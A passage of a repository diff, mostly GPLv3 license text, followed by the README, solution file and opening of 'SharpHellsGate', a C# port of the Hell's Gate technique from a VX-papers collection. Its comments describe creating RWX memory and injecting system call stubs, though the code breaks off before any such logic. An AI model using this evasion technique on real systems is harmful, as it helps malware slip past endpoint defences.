modified versions of the software inside them, although the manufacturer
|
||||
can do so. This is fundamentally incompatible with the aim of
|
||||
protecting users' freedom to change the software. The systematic
|
||||
pattern of such abuse occurs in the area of products for individuals to
|
||||
use, which is precisely where it is most unacceptable. Therefore, we
|
||||
have designed this version of the GPL to prohibit the practice for those
|
||||
products. If such problems arise substantially in other domains, we
|
||||
stand ready to extend this provision to those domains in future versions
|
||||
of the GPL, as needed to protect the freedom of users.
|
||||
|
||||
Finally, every program is threatened constantly by software patents.
|
||||
States should not allow patents to restrict development and use of
|
||||
software on general-purpose computers, but in those that do, we wish to
|
||||
avoid the special danger that patents applied to a free program could
|
||||
make it effectively proprietary. To prevent this, the GPL assures that
|
||||
patents cannot be used to render the program non-free.
|
||||
|
||||
The precise terms and conditions for copying, distribution and
|
||||
modification follow.
|
||||
|
||||
TERMS AND CONDITIONS
|
||||
|
||||
0. Definitions.
|
||||
|
||||
"This License" refers to version 3 of the GNU General Public License.
|
||||
|
||||
"Copyright" also means copyright-like laws that apply to other kinds of
|
||||
works, such as semiconductor masks.
|
||||
|
||||
"The Program" refers to any copyrightable work licensed under this
|
||||
License. Each licensee is addressed as "you". "Licensees" and
|
||||
"recipients" may be individuals or organizations.
|
||||
|
||||
To "modify" a work means to copy from or adapt all or part of the work
|
||||
in a fashion requiring copyright permission, other than the making of an
|
||||
exact copy. The resulting work is called a "modified version" of the
|
||||
earlier work or a work "based on" the earlier work.
|
||||
|
||||
A "covered work" means either the unmodified Program or a work based
|
||||
on the Program.
|
||||
|
||||
To "propagate" a work means to do anything with it that, without
|
||||
permission, would make you directly or secondarily liable for
|
||||
infringement under applicable copyright law, except executing it on a
|
||||
computer or modifying a private copy. Propagation includes copying,
|
||||
distribution (with or without modification), making available to the
|
||||
public, and in some countries other activities as well.
|
||||
|
||||
To "convey" a work means any kind of propagation that enables other
|
||||
parties to make or receive copies. Mere interaction with a user through
|
||||
a computer network, with no transfer of a copy, is not conveying.
|
||||
|
||||
An interactive user interface displays "Appropriate Legal Notices"
|
||||
to the extent that it includes a convenient and prominently visible
|
||||
feature that (1) displays an appropriate copyright notice, and (2)
|
||||
tells the user that there is no warranty for the work (except to the
|
||||
extent that warranties are provided), that licensees may convey the
|
||||
work under this License, and how to view a copy of this License. If
|
||||
the interface presents a list of user commands or options, such as a
|
||||
menu, a prominent item in the list meets this criterion.
|
||||
|
||||
1. Source Code.
|
||||
|
||||
The "source code" for a work means the preferred form of the work
|
||||
for making modifications to it. "Object code" means any non-source
|
||||
form of a work.
|
||||
|
||||
A "Standard Interface" means an interface that either is an official
|
||||
standard defined by a recognized standards body, or, in the case of
|
||||
interfaces specified for a particular programming language, one that
|
||||
is widely used among developers working in that language.
|
||||
|
||||
The "System Libraries" of an executable work include anything, other
|
||||
than the work as a whole, that (a) is included in the normal form of
|
||||
packaging a Major Component, but which is not part of that Major
|
||||
Component, and (b) serves only to enable use of the work with that
|
||||
Major Component, or to implement a Standard Interface for which an
|
||||
implementation is available to the public in source code form. A
|
||||
"Major Component", in this context, means a major essential component
|
||||
(kernel, window system, and so on) of the specific operating system
|
||||
(if any) on which the executable work runs, or a compiler used to
|
||||
produce the work, or an object code interpreter used to run it.
|
||||
|
||||
The "Corresponding Source" for a work in object code form means all
|
||||
the source code needed to generate, install, and (for an executable
|
||||
work) run the object code and to modify the work, including scripts to
|
||||
control those activities. However, it does not include the work's
|
||||
System Libraries, or general-purpose tools or generally available free
|
||||
programs which are used unmodified in performing those activities but
|
||||
which are not part of the work. For example, Corresponding Source
|
||||
includes interface definition files associated with source files for
|
||||
the work, and the source code for shared libraries and dynamically
|
||||
linked subprograms that the work is specifically designed to require,
|
||||
such as by intimate data communication or control flow between those
|
||||
subprograms and other parts of the work.
|
||||
|
||||
The Corresponding Source need not include anything that users
|
||||
can regenerate automatically from other parts of the Corresponding
|
||||
Source.
|
||||
|
||||
The Corresponding Source for a work in source code form is that
|
||||
same work.
|
||||
|
||||
2. Basic Permissions.
|
||||
|
||||
All rights granted under this License are granted for the term of
|
||||
copyright on the Program, and are irrevocable provided the stated
|
||||
conditions are met. This License explicitly affirms your unlimited
|
||||
permission to run the unmodified Program. The output from running a
|
||||
covered work is covered by this License only if the output, given its
|
||||
content, constitutes a covered work. This License acknowledges your
|
||||
rights of fair use or other equivalent, as provided by copyright law.
|
||||
|
||||
You may make, run and propagate covered works that you do not
|
||||
convey, without conditions so long as your license otherwise remains
|
||||
in force. You may convey covered works to others for the sole purpose
|
||||
of having them make modifications exclusively for you, or provide you
|
||||
with facilities for running those works, provided that you comply with
|
||||
the terms of this License in conveying all material for which you do
|
||||
not control copyright. Those thus making or running the covered works
|
||||
for you must do so exclusively on your behalf, under your direction
|
||||
and control, on terms that prohibit them from making any copies of
|
||||
your copyrighted material outside their relationship with you.
|
||||
|
||||
Conveying under any other circumstances is permitted solely under
|
||||
the conditions stated below. Sublicensing is not allowed; section 10
|
||||
makes it unnecessary.
|
||||
|
||||
3. Protecting Users' Legal Rights From Anti-Circumvention Law.
|
||||
|
||||
No covered work shall be deemed part of an effective technological
|
||||
measure under any applicable law fulfilling obligations under article
|
||||
11 of the WIPO copyright treaty adopted on 20 December 1996, or
|
||||
similar laws prohibiting or restricting circumvention of such
|
||||
measures.
|
||||
|
||||
When you convey a covered work, you waive any legal power to forbid
|
||||
circumvention of technological measures to the extent such circumvention
|
||||
is effected by exercising rights under this License with respect to
|
||||
the covered work, and you disclaim any intention to limit operation or
|
||||
modification of the work as a means of enforcing, against the work's
|
||||
users, your or third parties' legal rights to forbid circumvention of
|
||||
technological measures.
|
||||
|
||||
4. Conveying Verbatim Copies.
|
||||
|
||||
You may convey verbatim copies of the Program's source code as you
|
||||
receive it, in any medium, provided that you conspicuously and
|
||||
appropriately publish on each copy an appropriate copyright notice;
|
||||
keep intact all notices stating that this License and any
|
||||
non-permissive terms added in accord with section 7 apply to the code;
|
||||
keep intact all notices of the absence of any warranty; and give all
|
||||
recipients a copy of this License along with the Program.
|
||||
|
||||
You may charge any price or no price for each copy that you convey,
|
||||
and you may offer support or warranty protection for a fee.
|
||||
|
||||
5. Conveying Modified Source Versions.
|
||||
|
||||
You may convey a work based on the Program, or the modifications to
|
||||
produce it from the Program, in the form of source code under the
|
||||
terms of section 4, provided that you also meet all of these conditions:
|
||||
|
||||
a) The work must carry prominent notices stating that you modified
|
||||
it, and giving a relevant date.
|
||||
|
||||
b) The work must carry prominent notices stating that it is
|
||||
released under this License and any conditions added under section
|
||||
7. This requirement modifies the requirement in section 4 to
|
||||
"keep intact all notices".
|
||||
|
||||
c) You must license the entire work, as a whole, under this
|
||||
License to anyone who comes into possession of a copy. This
|
||||
License will therefore apply, along with any applicable section 7
|
||||
additional terms, to the whole of the work, and all its parts,
|
||||
regardless of how they are packaged. This License gives no
|
||||
permission to license the work in any other way, but it does not
|
||||
invalidate such permission if you have separately received it.
|
||||
|
||||
d) If the work has interactive user interfaces, each must display
|
||||
Appropriate Legal Notices; however, if the Program has interactive
|
||||
interfaces that do not display Appropriate Legal Notices, your
|
||||
work need not make them do so.
|
||||
|
||||
A compilation of a covered work with other separate and independent
|
||||
works, which are not by their nature extensions of the covered work,
|
||||
and which are not combined with it such as to form a larger program,
|
||||
in or on a volume of a storage or distribution medium, is called an
|
||||
"aggregate" if the compilation and its resulting copyright are not
|
||||
used to limit the access or legal rights of the compilation's users
|
||||
beyond what the individual works permit. Inclusion of a covered work
|
||||
in an aggregate does not cause this License to apply to the other
|
||||
parts of the aggregate.
|
||||
|
||||
6. Conveying Non-Source Forms.
|
||||
|
||||
You may convey a covered work in object code form under the terms
|
||||
of sections 4 and 5, provided that you also convey the
|
||||
machine-readable Corresponding Source under the terms of this License,
|
||||
in one of these ways:
|
||||
|
||||
a) Convey the object code in, or embodied in, a physical product
|
||||
(including a physical distribution medium), accompanied by the
|
||||
Corresponding Source fixed on a durable physical medium
|
||||
customarily used for software interchange.
|
||||
|
||||
b) Convey the object code in, or embodied in, a physical product
|
||||
(including a physical distribution medium), accompanied by a
|
||||
written offer, valid for at least three years and valid for as
|
||||
long as you offer spare parts or customer support for that product
|
||||
model, to give anyone who possesses the object code either (1) a
|
||||
copy of the Corresponding Source for all the software in the
|
||||
product that is covered by this License, on a durable physical
|
||||
medium customarily used for software interchange, for a price no
|
||||
more than your reasonable cost of physically performing this
|
||||
conveying of source, or (2) access to copy the
|
||||
Corresponding Source from a network server at no charge.
|
||||
|
||||
c) Convey individual copies of the object code with a copy of the
|
||||
written offer to provide the Corresponding Source. This
|
||||
alternative is allowed only occasionally and noncommercially, and
|
||||
only if you received the object code with such an offer, in accord
|
||||
with subsection 6b.
|
||||
|
||||
d) Convey the object code by offering access from a designated
|
||||
place (gratis or for a charge), and offer equivalent access to the
|
||||
Corresponding Source in the same way through the same place at no
|
||||
further charge. You need not require recipients to copy the
|
||||
Corresponding Source along with the object code. If the place to
|
||||
copy the object code is a network server, the Corresponding Source
|
||||
may be on a different server (operated by you or a third party)
|
||||
that supports equivalent copying facilities, provided you maintain
|
||||
clear directions next to the object code saying where to find the
|
||||
Corresponding Source. Regardless of what server hosts the
|
||||
Corresponding Source, you remain obligated to ensure that it is
|
||||
available for as long as needed to satisfy these requirements.
|
||||
|
||||
e) Convey the object code using peer-to-peer transmission, provided
|
||||
you inform other peers where the object code and Corresponding
|
||||
Source of the work are being offered to the general public at no
|
||||
charge under subsection 6d.
|
||||
|
||||
A separable portion of the object code, whose source code is excluded
|
||||
from the Corresponding Source as a System Library, need not be
|
||||
included in conveying the object code work.
|
||||
|
||||
A "User Product" is either (1) a "consumer product", which means any
|
||||
tangible personal property which is normally used for personal, family,
|
||||
or household purposes, or (2) anything designed or sold for incorporation
|
||||
into a dwelling. In determining whether a product is a consumer product,
|
||||
doubtful cases shall be resolved in favor of coverage. For a particular
|
||||
product received by a particular user, "normally used" refers to a
|
||||
typical or common use of that class of product, regardless of the status
|
||||
of the particular user or of the way in which the particular user
|
||||
actually uses, or expects or is expected to use, the product. A product
|
||||
is a consumer product regardless of whether the product has substantial
|
||||
commercial, industrial or non-consumer uses, unless such uses represent
|
||||
the only significant mode of use of the product.
|
||||
|
||||
"Installation Information" for a User Product means any methods,
|
||||
procedures, authorization keys, or other information required to install
|
||||
and execute modified versions of a covered work in that User Product from
|
||||
a modified version of its Corresponding Source. The information must
|
||||
suffice to ensure that the continued functioning of the modified object
|
||||
code is in no case prevented or interfered with solely because
|
||||
modification has been made.
|
||||
|
||||
If you convey an object code work under this section in, or with, or
|
||||
specifically for use in, a User Product, and the conveying occurs as
|
||||
part of a transaction in which the right of possession and use of the
|
||||
User Product is transferred to the recipient in perpetuity or for a
|
||||
fixed term (regardless of how the transaction is characterized), the
|
||||
Corresponding Source conveyed under this section must be accompanied
|
||||
by the Installation Information. But this requirement does not apply
|
||||
if neither you nor any third party retains the ability to install
|
||||
modified object code on the User Product (for example, the work has
|
||||
been installed in ROM).
|
||||
|
||||
The requirement to provide Installation Information does not include a
|
||||
requirement to continue to provide support service, warranty, or updates
|
||||
for a work that has been modified or installed by the recipient, or for
|
||||
the User Product in which it has been modified or installed. Access to a
|
||||
network may be denied when the modification itself materially and
|
||||
adversely affects the operation of the network or violates the rules and
|
||||
protocols for communication across the network.
|
||||
|
||||
Corresponding Source conveyed, and Installation Information provided,
|
||||
in accord with this section must be in a format that is publicly
|
||||
documented (and with an implementation available to the public in
|
||||
source code form), and must require no special password or key for
|
||||
unpacking, reading or copying.
|
||||
|
||||
7. Additional Terms.
|
||||
|
||||
"Additional permissions" are terms that supplement the terms of this
|
||||
License by making exceptions from one or more of its conditions.
|
||||
Additional permissions that are applicable to the entire Program shall
|
||||
be treated as though they were included in this License, to the extent
|
||||
that they are valid under applicable law. If additional permissions
|
||||
apply only to part of the Program, that part may be used separately
|
||||
under those permissions, but the entire Program remains governed by
|
||||
this License without regard to the additional permissions.
|
||||
|
||||
When you convey a copy of a covered work, you may at your option
|
||||
remove any additional permissions from that copy, or from any part of
|
||||
it. (Additional permissions may be written to require their own
|
||||
removal in certain cases when you modify the work.) You may place
|
||||
additional permissions on material, added by you to a covered work,
|
||||
for which you have or can give appropriate copyright permission.
|
||||
|
||||
Notwithstanding any other provision of this License, for material you
|
||||
add to a covered work, you may (if authorized by the copyright holders of
|
||||
that material) supplement the terms of this License with terms:
|
||||
|
||||
a) Disclaiming warranty or limiting liability differently from the
|
||||
terms of sections 15 and 16 of this License; or
|
||||
|
||||
b) Requiring preservation of specified reasonable legal notices or
|
||||
author attributions in that material or in the Appropriate Legal
|
||||
Notices displayed by works containing it; or
|
||||
|
||||
c) Prohibiting misrepresentation of the origin of that material, or
|
||||
requiring that modified versions of such material be marked in
|
||||
reasonable ways as different from the original version; or
|
||||
|
||||
d) Limiting the use for publicity purposes of names of licensors or
|
||||
authors of the material; or
|
||||
|
||||
e) Declining to grant rights under trademark law for use of some
|
||||
trade names, trademarks, or service marks; or
|
||||
|
||||
f) Requiring indemnification of licensors and authors of that
|
||||
material by anyone who conveys the material (or modified versions of
|
||||
it) with contractual assumptions of liability to the recipient, for
|
||||
any liability that these contractual assumptions directly impose on
|
||||
those licensors and authors.
|
||||
|
||||
All other non-permissive additional terms are considered "further
|
||||
restrictions" within the meaning of section 10. If the Program as you
|
||||
received it, or any part of it, contains a notice stating that it is
|
||||
governed by this License along with a term that is a further
|
||||
restriction, you may remove that term. If a license document contains
|
||||
a further restriction but permits relicensing or conveying under this
|
||||
License, you may add to a covered work material governed by the terms
|
||||
of that license document, provided that the further restriction does
|
||||
not survive such relicensing or conveying.
|
||||
|
||||
If you add terms to a covered work in accord with this section, you
|
||||
must place, in the relevant source files, a statement of the
|
||||
additional terms that apply to those files, or a notice indicating
|
||||
where to find the applicable terms.
|
||||
|
||||
Additional terms, permissive or non-permissive, may be stated in the
|
||||
form of a separately written license, or stated as exceptions;
|
||||
the above requirements apply either way.
|
||||
|
||||
8. Termination.
|
||||
|
||||
You may not propagate or modify a covered work except as expressly
|
||||
provided under this License. Any attempt otherwise to propagate or
|
||||
modify it is void, and will automatically terminate your rights under
|
||||
this License (including any patent licenses granted under the third
|
||||
paragraph of section 11).
|
||||
|
||||
However, if you cease all violation of this License, then your
|
||||
license from a particular copyright holder is reinstated (a)
|
||||
provisionally, unless and until the copyright holder explicitly and
|
||||
finally terminates your license, and (b) permanently, if the copyright
|
||||
holder fails to notify you of the violation by some reasonable means
|
||||
prior to 60 days after the cessation.
|
||||
|
||||
Moreover, your license from a particular copyright holder is
|
||||
reinstated permanently if the copyright holder notifies you of the
|
||||
violation by some reasonable means, this is the first time you have
|
||||
received notice of violation of this License (for any work) from that
|
||||
copyright holder, and you cure the violation prior to 30 days after
|
||||
your receipt of the notice.
|
||||
|
||||
Termination of your rights under this section does not terminate the
|
||||
licenses of parties who have received copies or rights from you under
|
||||
this License. If your rights have been terminated and not permanently
|
||||
reinstated, you do not qualify to receive new licenses for the same
|
||||
material under section 10.
|
||||
|
||||
9. Acceptance Not Required for Having Copies.
|
||||
|
||||
You are not required to accept this License in order to receive or
|
||||
run a copy of the Program. Ancillary propagation of a covered work
|
||||
occurring solely as a consequence of using peer-to-peer transmission
|
||||
to receive a copy likewise does not require acceptance. However,
|
||||
nothing other than this License grants you permission to propagate or
|
||||
modify any covered work. These actions infringe copyright if you do
|
||||
not accept this License. Therefore, by modifying or propagating a
|
||||
covered work, you indicate your acceptance of this License to do so.
|
||||
|
||||
10. Automatic Licensing of Downstream Recipients.
|
||||
|
||||
Each time you convey a covered work, the recipient automatically
|
||||
receives a license from the original licensors, to run, modify and
|
||||
propagate that work, subject to this License. You are not responsible
|
||||
for enforcing compliance by third parties with this License.
|
||||
|
||||
An "entity transaction" is a transaction transferring control of an
|
||||
organization, or substantially all assets of one, or subdividing an
|
||||
organization, or merging organizations. If propagation of a covered
|
||||
work results from an entity transaction, each party to that
|
||||
transaction who receives a copy of the work also receives whatever
|
||||
licenses to the work the party's predecessor in interest had or could
|
||||
give under the previous paragraph, plus a right to possession of the
|
||||
Corresponding Source of the work from the predecessor in interest, if
|
||||
the predecessor has it or can get it with reasonable efforts.
|
||||
|
||||
You may not impose any further restrictions on the exercise of the
|
||||
rights granted or affirmed under this License. For example, you may
|
||||
not impose a license fee, royalty, or other charge for exercise of
|
||||
rights granted under this License, and you may not initiate litigation
|
||||
(including a cross-claim or counterclaim in a lawsuit) alleging that
|
||||
any patent claim is infringed by making, using, selling, offering for
|
||||
sale, or importing the Program or any portion of it.
|
||||
|
||||
11. Patents.
|
||||
|
||||
A "contributor" is a copyright holder who authorizes use under this
|
||||
License of the Program or a work on which the Program is based. The
|
||||
work thus licensed is called the contributor's "contributor version".
|
||||
|
||||
A contributor's "essential patent claims" are all patent claims
|
||||
owned or controlled by the contributor, whether already acquired or
|
||||
hereafter acquired, that would be infringed by some manner, permitted
|
||||
by this License, of making, using, or selling its contributor version,
|
||||
but do not include claims that would be infringed only as a
|
||||
consequence of further modification of the contributor version. For
|
||||
purposes of this definition, "control" includes the right to grant
|
||||
patent sublicenses in a manner consistent with the requirements of
|
||||
this License.
|
||||
|
||||
Each contributor grants you a non-exclusive, worldwide, royalty-free
|
||||
patent license under the contributor's essential patent claims, to
|
||||
make, use, sell, offer for sale, import and otherwise run, modify and
|
||||
propagate the contents of its contributor version.
|
||||
|
||||
In the following three paragraphs, a "patent license" is any express
|
||||
agreement or commitment, however denominated, not to enforce a patent
|
||||
(such as an express permission to practice a patent or covenant not to
|
||||
sue for patent infringement). To "grant" such a patent license to a
|
||||
party means to make such an agreement or commitment not to enforce a
|
||||
patent against the party.
|
||||
|
||||
If you convey a covered work, knowingly relying on a patent license,
|
||||
and the Corresponding Source of the work is not available for anyone
|
||||
to copy, free of charge and under the terms of this License, through a
|
||||
publicly available network server or other readily accessible means,
|
||||
then you must either (1) cause the Corresponding Source to be so
|
||||
available, or (2) arrange to deprive yourself of the benefit of the
|
||||
patent license for this particular work, or (3) arrange, in a manner
|
||||
consistent with the requirements of this License, to extend the patent
|
||||
license to downstream recipients. "Knowingly relying" means you have
|
||||
actual knowledge that, but for the patent license, your conveying the
|
||||
covered work in a country, or your recipient's use of the covered work
|
||||
in a country, would infringe one or more identifiable patents in that
|
||||
country that you have reason to believe are valid.
|
||||
|
||||
If, pursuant to or in connection with a single transaction or
|
||||
arrangement, you convey, or propagate by procuring conveyance of, a
|
||||
covered work, and grant a patent license to some of the parties
|
||||
receiving the covered work authorizing them to use, propagate, modify
|
||||
or convey a specific copy of the covered work, then the patent license
|
||||
you grant is automatically extended to all recipients of the covered
|
||||
work and works based on it.
|
||||
|
||||
A patent license is "discriminatory" if it does not include within
|
||||
the scope of its coverage, prohibits the exercise of, or is
|
||||
conditioned on the non-exercise of one or more of the rights that are
|
||||
specifically granted under this License. You may not convey a covered
|
||||
work if you are a party to an arrangement with a third party that is
|
||||
in the business of distributing software, under which you make payment
|
||||
to the third party based on the extent of your activity of conveying
|
||||
the work, and under which the third party grants, to any of the
|
||||
parties who would receive the covered work from you, a discriminatory
|
||||
patent license (a) in connection with copies of the covered work
|
||||
conveyed by you (or copies made from those copies), or (b) primarily
|
||||
for and in connection with specific products or compilations that
|
||||
contain the covered work, unless you entered into that arrangement,
|
||||
or that patent license was granted, prior to 28 March 2007.
|
||||
|
||||
Nothing in this License shall be construed as excluding or limiting
|
||||
any implied license or other defenses to infringement that may
|
||||
otherwise be available to you under applicable patent law.
|
||||
|
||||
12. No Surrender of Others' Freedom.
|
||||
|
||||
If conditions are imposed on you (whether by court order, agreement or
|
||||
otherwise) that contradict the conditions of this License, they do not
|
||||
excuse you from the conditions of this License. If you cannot convey a
|
||||
covered work so as to satisfy simultaneously your obligations under this
|
||||
License and any other pertinent obligations, then as a consequence you may
|
||||
not convey it at all. For example, if you agree to terms that obligate you
|
||||
to collect a royalty for further conveying from those to whom you convey
|
||||
the Program, the only way you could satisfy both those terms and this
|
||||
License would be to refrain entirely from conveying the Program.
|
||||
|
||||
13. Use with the GNU Affero General Public License.
|
||||
|
||||
Notwithstanding any other provision of this License, you have
|
||||
permission to link or combine any covered work with a work licensed
|
||||
under version 3 of the GNU Affero General Public License into a single
|
||||
combined work, and to convey the resulting work. The terms of this
|
||||
License will continue to apply to the part which is the covered work,
|
||||
but the special requirements of the GNU Affero General Public License,
|
||||
section 13, concerning interaction through a network will apply to the
|
||||
combination as such.
|
||||
|
||||
14. Revised Versions of this License.
|
||||
|
||||
The Free Software Foundation may publish revised and/or new versions of
|
||||
the GNU General Public License from time to time. Such new versions will
|
||||
be similar in spirit to the present version, but may differ in detail to
|
||||
address new problems or concerns.
|
||||
|
||||
Each version is given a distinguishing version number. If the
|
||||
Program specifies that a certain numbered version of the GNU General
|
||||
Public License "or any later version" applies to it, you have the
|
||||
option of following the terms and conditions either of that numbered
|
||||
version or of any later version published by the Free Software
|
||||
Foundation. If the Program does not specify a version number of the
|
||||
GNU General Public License, you may choose any version ever published
|
||||
by the Free Software Foundation.
|
||||
|
||||
If the Program specifies that a proxy can decide which future
|
||||
versions of the GNU General Public License can be used, that proxy's
|
||||
public statement of acceptance of a version permanently authorizes you
|
||||
to choose that version for the Program.
|
||||
|
||||
Later license versions may give you additional or different
|
||||
permissions. However, no additional obligations are imposed on any
|
||||
author or copyright holder as a result of your choosing to follow a
|
||||
later version.
|
||||
|
||||
15. Disclaimer of Warranty.
|
||||
|
||||
THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY
|
||||
APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT
|
||||
HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY
|
||||
OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,
|
||||
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
|
||||
PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM
|
||||
IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF
|
||||
ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
|
||||
|
||||
16. Limitation of Liability.
|
||||
|
||||
IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
|
||||
WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS
|
||||
THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY
|
||||
GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE
|
||||
USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF
|
||||
DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD
|
||||
PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS),
|
||||
EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF
|
||||
SUCH DAMAGES.
|
||||
|
||||
17. Interpretation of Sections 15 and 16.
|
||||
|
||||
If the disclaimer of warranty and limitation of liability provided
|
||||
above cannot be given local legal effect according to their terms,
|
||||
reviewing courts shall apply local law that most closely approximates
|
||||
an absolute waiver of all civil liability in connection with the
|
||||
Program, unless a warranty or assumption of liability accompanies a
|
||||
copy of the Program in return for a fee.
|
||||
|
||||
END OF TERMS AND CONDITIONS
|
||||
|
||||
How to Apply These Terms to Your New Programs
|
||||
|
||||
If you develop a new program, and you want it to be of the greatest
|
||||
possible use to the public, the best way to achieve this is to make it
|
||||
free software which everyone can redistribute and change under these terms.
|
||||
|
||||
To do so, attach the following notices to the program. It is safest
|
||||
to attach them to the start of each source file to most effectively
|
||||
state the exclusion of warranty; and each file should have at least
|
||||
the "copyright" line and a pointer to where the full notice is found.
|
||||
|
||||
<one line to give the program's name and a brief idea of what it does.>
|
||||
Copyright (C) <year> <name of author>
|
||||
|
||||
This program is free software: you can redistribute it and/or modify
|
||||
it under the terms of the GNU General Public License as published by
|
||||
the Free Software Foundation, either version 3 of the License, or
|
||||
(at your option) any later version.
|
||||
|
||||
This program is distributed in the hope that it will be useful,
|
||||
but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||
GNU General Public License for more details.
|
||||
|
||||
You should have received a copy of the GNU General Public License
|
||||
along with this program. If not, see <https://www.gnu.org/licenses/>.
|
||||
|
||||
Also add information on how to contact you by electronic and paper mail.
|
||||
|
||||
If the program does terminal interaction, make it output a short
|
||||
notice like this when it starts in an interactive mode:
|
||||
|
||||
<program> Copyright (C) <year> <name of author>
|
||||
This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
|
||||
This is free software, and you are welcome to redistribute it
|
||||
under certain conditions; type `show c' for details.
|
||||
|
||||
The hypothetical commands `show w' and `show c' should show the appropriate
|
||||
parts of the General Public License. Of course, your program's commands
|
||||
might be different; for a GUI interface, you would use an "about box".
|
||||
|
||||
You should also get your employer (if you work as a programmer) or school,
|
||||
if any, to sign a "copyright disclaimer" for the program, if necessary.
|
||||
For more information on this, and how to apply and follow the GNU GPL, see
|
||||
<https://www.gnu.org/licenses/>.
|
||||
|
||||
The GNU General Public License does not permit incorporating your program
|
||||
into proprietary programs. If your program is a subroutine library, you
|
||||
may consider it more useful to permit linking proprietary applications with
|
||||
the library. If this is what you want to do, use the GNU Lesser General
|
||||
Public License instead of this License. But first, please read
|
||||
<https://www.gnu.org/licenses/why-not-lgpl.html>.
|
11
VXUG-Papers/Hells Gate/C# Implementation/README.md
Normal file
11
VXUG-Papers/Hells Gate/C# Implementation/README.md
Normal file
|
@ -0,0 +1,11 @@
|
|||
## C# Hell's Gate ##
|
||||
C# Implementation of the Hell's Gate VX Technique
|
||||
<br />
|
||||
<br />
|
||||
Link to the paper: https://vxug.fakedoma.in/papers/VXUG/Exclusive/HellsGate.pdf
|
||||
<br /> PDF also included in this repository.
|
||||
<br />
|
||||
<br />
|
||||
Link to the original C implementation: https://github.com/am0nsec/HellsGate
|
||||
<br />
|
||||
<br />
|
25
VXUG-Papers/Hells Gate/C# Implementation/SharpHellsGate.sln
Normal file
25
VXUG-Papers/Hells Gate/C# Implementation/SharpHellsGate.sln
Normal file
|
@ -0,0 +1,25 @@
|
|||
|
||||
Microsoft Visual Studio Solution File, Format Version 12.00
|
||||
# Visual Studio Version 16
|
||||
VisualStudioVersion = 16.0.30114.105
|
||||
MinimumVisualStudioVersion = 10.0.40219.1
|
||||
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SharpHellsGate", "SharpHellsGate\SharpHellsGate.csproj", "{F6A46854-FDC2-4F27-9051-5C7BE8E68733}"
|
||||
EndProject
|
||||
Global
|
||||
GlobalSection(SolutionConfigurationPlatforms) = preSolution
|
||||
Debug|Any CPU = Debug|Any CPU
|
||||
Release|Any CPU = Release|Any CPU
|
||||
EndGlobalSection
|
||||
GlobalSection(ProjectConfigurationPlatforms) = postSolution
|
||||
{F6A46854-FDC2-4F27-9051-5C7BE8E68733}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
|
||||
{F6A46854-FDC2-4F27-9051-5C7BE8E68733}.Debug|Any CPU.Build.0 = Debug|Any CPU
|
||||
{F6A46854-FDC2-4F27-9051-5C7BE8E68733}.Release|Any CPU.ActiveCfg = Release|Any CPU
|
||||
{F6A46854-FDC2-4F27-9051-5C7BE8E68733}.Release|Any CPU.Build.0 = Release|Any CPU
|
||||
EndGlobalSection
|
||||
GlobalSection(SolutionProperties) = preSolution
|
||||
HideSolutionNode = FALSE
|
||||
EndGlobalSection
|
||||
GlobalSection(ExtensibilityGlobals) = postSolution
|
||||
SolutionGuid = {CA2A2F5F-A135-4771-A014-A6F2C0D24538}
|
||||
EndGlobalSection
|
||||
EndGlobal
|
|
@ -0,0 +1,278 @@
|
|||
using System;
|
||||
using SharpHellsGate.Win32;
|
||||
using System.Runtime.InteropServices;
|
||||
using System.Collections.Generic;
|
||||
using System.Reflection;
|
||||
using System.Runtime.CompilerServices;
|
||||
|
||||
namespace SharpHellsGate {
|
||||
|
||||
/// <summary>
|
||||
/// Main implementation of the Hell's Gate technique.
|
||||
/// Responsible for generating a RWX memory region, inject and execute system call stubs.
|
||||
/// </summary>
|
||||
public class HellsGate {
|
||||
|
||||
/// <summary>
|
||||
/// Used to check if the RWX memory region was generated.
|
||||
/// </summary>
|
||||
private bool IsGateReady { get; set; } = false;
|
||||
|
||||
/// <summary>
|
||||
/// Used as for mutual exclusion while injecting and execution of the system call stub in memory.
|
||||
/// </summary>
|
||||
private object Mutant { get; set; } = new object();
|
||||
|
||||
/// <summary>
|
||||
///
|
||||
/// </summary>
|
||||
private Dictionary<UInt64, Util.APITableEntry> APITable { get; set; } = new Dictionary<ulong, Util.APITableEntry>() { };
|
||||
|
||||
/// <summary>
|
||||
/// Address of the managed method that was JIT'ed.
|
||||
/// </summary>
|
||||
private IntPtr MangedMethodAddress { get; set; } = IntPtr.Zero;
|
||||
|
||||
/// <summary>
|
||||
/// Address of the RWX memory region after JIT compiling the managed method.
|
||||
/// </summary>
|
||||
private IntPtr UnmanagedMethodAddress { get; set; } = IntPtr.Zero;
|
||||
|
||||
/// <summary>
|
||||
/// This function will be JIT at runtime to create RWX memory region.
|
||||
/// </summary>
|
||||
//// <returns>Gate returns either STATUS_SUCCESS or an error status code.</returns>
|
||||
[MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)]
|
||||
private static UInt32 Gate() {
|
||||
return new UInt32();
